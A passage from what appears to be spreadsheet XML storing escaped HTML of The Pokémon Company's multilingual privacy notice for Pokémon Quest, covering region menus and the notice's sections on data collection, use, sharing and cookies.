				&lt;li&gt;Malaysia&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;People’s Republic of China (Hong Kong)&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;People’s Republic of China (Macau)&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Taiwan&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Japan&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;South Korea&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_fr"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#fr"&gt;Pour les utilisateurs résidant hors de l'Asie*&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;Pour les utilisateurs résidant au Japon&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;Pour les utilisateurs résidant en Corée du Sud&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en_asia"&gt;Pour les utilisateurs résidant en Asie*</t>
  </si>
  <si>
    <t>sauf Japon et Corée du Sud&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('fr_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;Asie *&lt;/a&gt;_x005F_x000D_
			&lt;ul style="clear:both;display:none;" id="fr_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;République de l’Inde&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;République d’Indonésie&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;République de Singapour&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Royaume de Thaïlande&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;République islamique du Pakistan&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;République des Philippines&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Brunei Darussalam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;République Socialiste du Vietnam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Malaisie&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;République populaire de Chine (Hong Kong)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;République populaire de Chine (Macao)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Taïwan&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Japon&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Corée du Sud&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_it"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#it"&gt;Utenti residenti al di fuori dell'Asia *&lt;/a&gt;_x005F_x000D_
			 &lt;a class="lang__item2" href="#ja"&gt;Utenti residenti in Giappone&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;Utenti residenti in Corea del Sud&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en_asia"&gt;Utenti residenti in Asia*  eccetto Giappone e Corea del Sud&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('it_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;Asia *&lt;/a&gt;_x005F_x000D_
			&lt;ul style="clear:both;display:none;" id="it_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;Repubblica dell'India&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Repubblica di Indonesia&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Repubblica di Singapore&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Regno di Thailandia&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Repubblica islamica del Pakistan&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Repubblica delle Filippine&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Brunei Darussalam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Repubblica Socialista del Vietnam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Malesia&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Repubblica popolare cinese (Hong Kong)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Repubblica popolare cinese (Macao)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Taiwan&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Giappone&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Corea del Sud&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_de"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#de"&gt;Für außerhalb Asiens*  ansässige Nutzer&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;Für in Japan ansässige Nutzer&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;Für in Südkorea ansässige Nutzer&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en_asia"&gt;Für in Asien*  ansässige Nutzer mit</t>
  </si>
  <si>
    <t xml:space="preserve">Ausnahme von Japan und Südkorea&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('de_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;Asien *&lt;/a&gt;_x005F_x000D_
			&lt;ul style="clear:both;display:none;" id="de_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;Republik Indien&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Republik Indonesien&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Republik Singapur&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Königreich Thailand&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Islamische Republik Pakistan&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Republik der Philippinen&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Sultanat Brunei Darussalam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Sozialistische Republik Vietnam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Malaysia&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Volksrepublik China (Hongkong)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Volksrepublik China (Macau)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Taiwan&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Japan&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Südkorea&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_es"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#es"&gt;Para usuarios residentes fuera de Asia *&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;Para usuarios residentes en Japón&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;Para usuarios residentes en la República de Corea&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en_asia"&gt;Para usuarios residentes en Asia * excepto Japón y la República de Corea&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('es_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;Asia *&lt;/a&gt;_x005F_x000D_
			 &lt;ul style="clear:both;display:none;" id="es_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;República de la India&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;República de Indonesia&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;República de Singapur&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Reino de Tailandia&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;República Islámica de Pakistán&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;República de Filipinas&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Estado de Brunéi Darussalam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;República Socialista de Vietnam&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Malasia&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;República Popular China (Hong Kong)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;República Popular China (Macao)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Taiwán&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Japón&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;Corea del Sur&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_sc"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#sc"&gt;在亚洲 *以外居住的用户用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;在日本居住的用户用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;在韩国居住的用户用&lt;/a&gt;_x005F_x000D_
			</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a class="lang__item2" href="#sc_asia"&gt;在日本及韩国以外的亚洲 *居住的用户用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('sc_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;亚洲 *&lt;/a&gt;_x005F_x000D_
			&lt;ul style="clear:both;display:none;" id="sc_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;印度共和国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;印度尼西亚共和国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;新加坡共和国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;泰国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;巴基斯坦伊斯兰共和国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;菲律宾共和国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;文莱达鲁萨兰国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;越南社会主义共和国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;马来西亚&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;中国（香港）&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;中国（澳门）&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;台湾&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;日本&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;韩国&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_tc"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#tc"&gt;居住於亞洲 *以外的用戶所適用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;居住於日本的用戶所適用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;居住於韓國的用戶所適用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#tc_asia"&gt;居住於日本及韓國以外的亞洲 *的用戶所適用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('tc_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;亞洲 *&lt;/a&gt;_x005F_x000D_
			 &lt;ul style="clear:both;display:none;" id="tc_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;印度共和國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;印尼共和國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;新加坡共和國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;泰國王國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;巴基斯坦伊斯蘭共和國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;菲律賓共和國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;文萊達魯薩蘭國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;越南社會主義共和國&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;馬來西亞&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;中國（香港）&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;中國（澳門）&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;台灣&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;日本&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;南韓&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_ja"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en"&gt;アジア *以外にお住まいのユーザー用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;日本にお住まいのユーザー用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;韓国にお住まいのユーザー用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en_asia"&gt;日本・韓国以外のアジア *にお住まいのユーザー用&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('ja_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;アジア *&lt;/a&gt;_x005F_x000D_
			</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul style="clear:both;display:none;" id="ja_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;インド&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;インドネシア&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;シンガポール&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;タイ&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;パキスタン&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;フィリピン&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;ブルネイ・ダルサラーム&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;ベトナム&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;マレーシア&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;台湾&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;日本&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;韓国&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;中国（香港）&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;中国（マカオ）&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_kr"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en"&gt;아시아* 이외에 거주하는 유저용&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;일본에 거주하는 유저용&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;한국에 거주하는 유저용&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en_asia"&gt;일본, 한국 이외 아시아* 에 거주하는 유저용&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('kr_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;아시아 *&lt;/a&gt;_x005F_x000D_
			&lt;ul style="clear:both;display:none;" id="kr_top_alist" class="top_alist"&gt;_x005F_x000D_
								&lt;li&gt;인도&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;인도네시아&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;싱가포르&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;타이&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;파키스탄&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;필리핀&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;브루나이&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;베트남&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;말레이시아&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;중국(홍콩)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;중국(마카오)&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;대만&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;일본&lt;/li&gt;_x005F_x000D_
								&lt;li&gt;대한민국&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		_x005F_x000D_
		&lt;!--//--&gt;&lt;div id="en" class="block__anchor" style="margin-top:50%;"&gt;&lt;/div&gt;_x005F_x000D_
		&lt;div class="block"&gt;_x005F_x000D_
			&lt;h1&gt;&lt;span&gt;THE POKÉMON COMPANY PRIVACY NOTICE FOR POKÉMON QUEST&lt;/span&gt;_x005F_x000D_
			&lt;p&gt;For users outside Asia* (see the bottom of this notice for a list of countries in Asia)&lt;/p&gt;&lt;/h1&gt;_x005F_x000D_
			&lt;div class="block__inner"&gt;_x005F_x000D_
_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
				&lt;div class="block__item" id="en_1"&gt;_x005F_x000D_
					&lt;h2&gt;1. INTRODUCTION&lt;/h2&gt;_x005F_x000D_
					&lt;p&gt;_x005F_x000D_
                        </t>
  </si>
  <si>
    <t>This privacy notice (&lt;b&gt;Privacy Notice&lt;/b&gt;) sets out the ways in which we, The Pokémon Company, and its affiliates Pokémon Center Co., Ltd., The Pokémon Company International, Inc., and Pokémon Korea, Inc., collect and use your personal data (your personal information) in connection with Pokémon Quest (&lt;b&gt;our App&lt;/b&gt;). It also explains what rights you have to access or change your personal data. _x005F_x000D_
					&lt;/p&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
				&lt;div class="block__item" id="en_2"&gt;_x005F_x000D_
					&lt;h2&gt;2.</t>
  </si>
  <si>
    <t>ABOUT US&lt;/h2&gt;_x005F_x000D_
					&lt;ol&gt;_x005F_x000D_
                        &lt;li&gt;The Pokémon Company is a company registered in Japan, with our address as set out below.&lt;/li&gt;_x005F_x000D_
					   &lt;li&gt;You can contact us as follows. _x005F_x000D_
                           &lt;div class="box"&gt;_x005F_x000D_
                         The Pokémon Company International, Inc.&lt;br&gt; _x005F_x000D_
                        Attention: Pokémon Quest&lt;br&gt; _x005F_x000D_
                        Address: 10400 NE 4th Street, Suite 2800&lt;br&gt;  Bellevue, WA 98004 USA&lt;br&gt;  _x005F_x000D_
                        Email: privacyquestions@pokemon.com&lt;/div&gt;&lt;/li&gt;_x005F_x000D_
				    &lt;/ol&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_3"&gt;_x005F_x000D_
					&lt;h2&gt;3.</t>
  </si>
  <si>
    <t>INFORMATION WE COLLECT ABOUT YOU&lt;/h2&gt;_x005F_x000D_
					&lt;ol&gt;_x005F_x000D_
                        &lt;li&gt;&lt;b&gt;Information that you provide to us.&lt;/b&gt;_x005F_x000D_
					    &lt;ol&gt;_x005F_x000D_
                           &lt;li&gt;We will collect any information that you provide to us when you:_x005F_x000D_
                           &lt;ol&gt;_x005F_x000D_
                                 &lt;li&gt;access certain features or functions in our App that require personal information;&lt;/li&gt;_x005F_x000D_
                               &lt;li&gt;connect and share to a social network through our App, if you are over the age of 13 years;&lt;/li&gt;_x005F_x000D_
                               &lt;li&gt;make an inquiry, provide feedback, or make a complaint via email or our customer support site; and&lt;/li&gt;_x005F_x000D_
                               &lt;li&gt;submit correspondence to us via post, email or our customer support site.&lt;/li&gt;_x005F_x000D_
                           &lt;/ol&gt;&lt;/li&gt;_x005F_x000D_
                           &lt;</t>
  </si>
  <si>
    <t>li&gt;The information you provide to us when you use our App will include (depending on the circumstances):_x005F_x000D_
                           &lt;ol&gt;_x005F_x000D_
                                &lt;li&gt;&lt;b&gt;Identity data&lt;/b&gt;. Country where you are located and month and year of birth; and&lt;/li&gt;_x005F_x000D_
                               &lt;li&gt;&lt;b&gt;Player profile data&lt;/b&gt;. You may also provide a username, transfer/backup ID (to let you transfer your profile data to a new device) and language preferences.&lt;/li&gt;_x005F_x000D_
                               &lt;/ol&gt;_x005F_x000D_
                           &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;&lt;b&gt;Information we collect about you.</t>
  </si>
  <si>
    <t>&lt;/b&gt;_x005F_x000D_
                           &lt;ol&gt;_x005F_x000D_
                                &lt;li&gt;&lt;b&gt;Transactional data&lt;/b&gt;. We will collect information related to your purchase transactions through our App, including the date and time, the amounts charged and other related transaction details;&lt;/li&gt;_x005F_x000D_
                               &lt;li&gt;&lt;b&gt;Information contained in correspondence&lt;/b&gt;. We will collect any information contained in any correspondence between us.</t>
  </si>
  <si>
    <t>For example, if you contact us for customer support, we keep a record of that correspondence;&lt;/li&gt;_x005F_x000D_
                               &lt;li&gt;&lt;b&gt;Technical data&lt;/b&gt;. We will also collect certain information about how you use our App and the device that you use to access our App, even where you have not created an account or logged in. This might include your geographical location, device information (such as your hardware model, operating system information, unique device identifiers), advertising ID (in apps that display advertising), unique player identifiers such as a transfer/backup ID and key, player ID, player key, access key, the data transmitted by your browser (such as your IP address, time zone settings, access status / HTTP status code, language settings, time zone settings referral source), information about your interactions with the App, including time- and date-stamped information such as page views, requests, number of sessions, number of downloads, users’ game progress, and game play-related data, length of visit to the App, keystroke logs, and similar information.</t>
  </si>
  <si>
    <t>This information may be collected by a third-party analytics service provider on our behalf and/or may be collected using cookies or similar technologies. For more information on cookies, please read paragraph 6 below. &lt;/li&gt;_x005F_x000D_
                               &lt;li&gt;&lt;b&gt;App permissions&lt;/b&gt;.</t>
  </si>
  <si>
    <t>We may also request permission to access apps and certain features on your device. Our App may request access to GPS when you consent to our collecting geolocation data. We may also request access to your device’s photo features, if you wish to capture a screen save of the game screen in a photo album.&lt;/li&gt;_x005F_x000D_
                           &lt;/ol&gt;&lt;/li&gt;_x005F_x000D_
				    &lt;/ol&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_4"&gt;_x005F_x000D_
					&lt;h2&gt;4.</t>
  </si>
  <si>
    <t>HOW WE USE INFORMATION ABOUT YOU AND RECIPIENTS OF YOUR INFORMATION&lt;/h2&gt;_x005F_x000D_
                            &lt;ol&gt;_x005F_x000D_
                                &lt;li&gt;We will use your information for the purposes listed below either on the basis of:_x005F_x000D_
                                &lt;ol&gt;_x005F_x000D_
                                     &lt;li&gt;performance of your contract with us and the provision of our services to you;&lt;/li&gt;_x005F_x000D_
                                    &lt;li&gt;your consent (where we request it); &lt;/li&gt;_x005F_x000D_
                                    &lt;li&gt;our need to comply with a legal or regulatory obligation; or&lt;/li&gt;_x005F_x000D_
                                    &lt;li&gt;our legitimate interests.&lt;/li&gt;_x005F_x000D_
                                &lt;/ol&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;We use your information on the basis of the above (see paragraph 4.1) and for our legitimate business objectives, including for the following purposes:_x005F_x000D_
                                    &lt;ol&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;To provide access to our App&lt;/b&gt;. To provide you with access to our App in a manner convenient and optimal and with personalized content relevant to you and allow you to have a record of your game play within the App;&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;To allow you to access certain App features&lt;/b&gt;.</t>
  </si>
  <si>
    <t>To enable you to access features such as social network integration, in-App purchases, and game play;&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;To enable you to play with each other&lt;/b&gt;. We will use the information you have provided (such as your username and language settings) to enable you to play with each other;&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;To process and facilitate transactions between us&lt;/b&gt;. We will use your information to process transactions and payments, and to collect and recover money owed to us;&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;User and customer support&lt;/b&gt;.</t>
  </si>
  <si>
    <t>To provide customer service and support, deal with inquiries or complaints about our App, and share your information with our App developers, IT support provider, and payment services provider as necessary to provide customer support;&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;To send push notifications&lt;/b&gt;. To send you push notifications about your use of our App, our news, events, new App features, products, or services that we believe may interest you, provided that we have the requisite permission to do so;&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;Analysis&lt;/b&gt;. To use data analytics to improve our App, products/services, marketing, customer relationships, and experiences;&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;Fraud and unlawful activity detection and prevention&lt;/b&gt;.</t>
  </si>
  <si>
    <t>To protect, investigate, and deter against fraudulent, unauthorized, or illegal activity, including identity fraud; to protect the rights and property of Pokémon, our agents, our customers, and others, including to enforce our terms, policies, rules, and agreements; to protect the safety and security of any person; and/or to protect the safety and security of Pokémon’s and our partners’ Services, websites, and applications; and&lt;/li&gt;_x005F_x000D_
                                        &lt;li&gt;&lt;b&gt;Compliance with policies, procedures and laws&lt;/b&gt;. To enable us to comply with our policies and procedures and enforce our legal rights, or to share your information with our technical and legal advisors, and to comply with laws or respond to lawful requests and legal process, including, for example, complying with a court order or subpoena.&lt;/li&gt;_x005F_x000D_
                                    &lt;/ol&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;If you are in the EU and have any concerns about our processing, please refer to details of “The Rights of Users in the EU” in paragraph 9 below.&lt;/li&gt;_x005F_x000D_
                    &lt;/ol&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_5"&gt;_x005F_x000D_
					&lt;h2&gt;5. WHO WE MIGHT SHARE YOUR INFORMATION WITH&lt;/h2&gt;_x005F_x000D_
					&lt;p&gt;</t>
  </si>
  <si>
    <t>In connection with the purposes and on the lawful grounds described above, we will share your personal information when relevant with third parties, such as:_x005F_x000D_
                            &lt;ol&gt;_x005F_x000D_
                                &lt;li&gt;&lt;b&gt;App users that you play&lt;/b&gt;. Other App users who you play against or play with, who are based both inside and outside the EU;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;b&gt;Our service providers&lt;/b&gt;. Third-party vendors, consultants, and other service providers who work for us and access your personal information to do that work;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;b&gt;Corporate affiliates&lt;/b&gt;.</t>
  </si>
  <si>
    <t>The Pokémon Center Co., Ltd., The Pokémon Company International, Inc., and Pokémon Korea, Inc., based in Japan, the UK, and USA, and South Korea;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;b&gt;Prospective sellers and buyers of our business&lt;/b&gt;. In connection with or during negotiation of any merger, financing, acquisition, bankruptcy, dissolution, transaction, or proceeding involving sale, transfer, divestiture, or disclosure of all or a portion of our business or assets;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;b&gt;Other third parties (including professional advisers)&lt;/b&gt;. Any other third parties (including legal or other advisors, regulatory authorities, courts, law enforcement agencies and government agencies) based in the UK, USA, Japan, and other countries to enable us to enforce our legal rights, or to protect the rights, property or safety of our employees, or where such disclosure may be permitted or required by law.&lt;/li&gt;_x005F_x000D_
                            &lt;/ol&gt;_x005F_x000D_
                    &lt;/p&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_6"&gt;_x005F_x000D_
					&lt;h2&gt;6.</t>
  </si>
  <si>
    <t>COOKIES AND TRACKING&lt;/h2&gt;_x005F_x000D_
					&lt;ol&gt;_x005F_x000D_
                        &lt;li&gt;We and others use cookies, web beacons, device IDS, and other tracking mechanisms to ensure that you get the most out of our App. Cookies are small amounts of information in the form of text files which we store on the device you use to access our App. Cookies and other tracking mechanisms such as device IDs allow us and others to monitor your use of the software, simplify your use of our App, and help us and others associate your activities across websites, your browsers, and mobile devices you use for advertising purposes.</t>
  </si>
  <si>
    <t>&lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;If you do not wish for cookies to be installed on your device, you can change the settings on your device to reject cookies. For more information about how to reject cookies using your settings, please visit http://www.aboutcookies.org. Please note that if you set your internet browser to reject cookies, you may not be able to access all of the functions of our App.</t>
  </si>
  <si>
    <t>Since certain opt-out preferences are also stored in a cookie on your device (such as opt-outs from advertising companies), please note that if you remove all cookies, you will need to renew your opt-out choices. Some internet browsers may transmit “Do Not Track” signals. Because uniform standards for “Do Not Track” signals have not been adopted, our App may not be aware of or process “Do Not Track” signals.&lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;Our website may contain content and links to other sites that are operated by third parties that may also operate cookies and other tracking mechanisms.</t>
  </si>
  <si>
    <t xml:space="preserve">We do not control these third-party sites or their tracking activities, and this Privacy Notice does not apply to them. Please consult the terms and conditions and Privacy Notice of the relevant third-party site to find out how that site collects and uses your information and to establish whether and for what purpose it uses cookies.&lt;/li&gt;_x005F_x000D_
                    &lt;/ol&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_7"&gt;_x005F_x000D_
					&lt;h2&gt;7. HOW WE LOOK AFTER YOUR INFORMATION AND HOW LONG WE KEEP IT FOR&lt;/h2&gt;_x005F_x000D_
					</t>
  </si>
  <si>
    <t>&lt;ol&gt;_x005F_x000D_
